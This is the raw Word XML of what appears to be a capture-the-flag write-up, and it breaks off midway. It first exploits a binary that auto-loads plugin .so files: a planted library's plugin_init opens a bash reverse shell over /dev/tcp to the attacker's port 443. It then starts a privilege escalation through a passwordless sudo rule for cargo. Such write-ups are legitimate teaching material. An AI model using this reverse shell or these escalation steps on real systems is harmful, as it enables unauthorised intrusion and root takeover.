          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">plugin </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system, loading </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libraries at runtime and automatically executing the initialization function defined within them.</w:t>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52900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="113"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943600" cy="4152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0">
      <w:pPr>
        <w:spacing w:after="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In other words, this binary automatically loads and executes any </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file present in the director</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">y</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/opt/v2/plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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behavior allows us to insert a malicious</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> library into that directory, which will be loaded by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dlopen()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and have its </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">plugin_init()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function executed, enabling arbitrary code execution in the context of the user running the binary.</w:t>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exploitation, a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C file (exploit.c)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was created defining the function</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin_init,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which uses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to execute commands and start a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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&lt;stdio.h&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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&lt;fcntl.h&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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&lt;unistd.h&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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&lt;sys/stat.h&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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&lt;string.h&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">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plugin_init(void)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system("/bin/bash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/dev/tcp/&lt;machine-ip&gt;/443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C">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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="114"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943600" cy="1587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file was compiled to generate a shared library </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(.so),</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which can be dynamically loaded by the vulnerable binary during execution.</w:t>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exploit.c</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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="95"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1016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library generated, it was copied to the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/v2/plugins</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where the vulnerable binary searches for plugins. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is automatically loaded and executed during service execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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/opt/v2/plugins</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11200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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43600" cy="711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waiting for execution of the newly created library, we s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uccessfully received the reverse shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connection, confirming execution of the malicious code by the vulnerable binary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="97"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186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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an interactive shell associated with a real terminal, allowing better session control such as using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl+C, Ctrl+Z, TAB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> auto-completion, and proper execution of interactive commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">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bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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ctr+z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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-echo;fg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="98"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user flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is located in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/astrid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C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753100" cy="942975"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="99"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53100" cy="9429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F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8l5s2i9ys2l6" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>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with access as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">astrid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we used the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to verify which commands this user can execute as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">without requiring a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D2">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1092200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="100"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943600" cy="1092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was identified that user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">astrid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has permission to execute the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/.cargo/bin/cargo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as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without requiring a password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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Cargo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the project and dependency manager for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rust </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">programming language, used to compile, run, and manage Rust applications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">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this binary, it is possible to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute commands as root. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To do so, we </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">created a new project using Cargo,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which allows code execution during the build or run process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">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/root/.cargo/bin/cargo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project1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">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E">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F">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647700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="101"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43600" cy="647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project was moved to the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directory, ensuring write permissions and allowing manipulation of necessary files for exploitation.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projetct1/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/tmp/project1</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49300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="102"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749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modified the project’s main file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
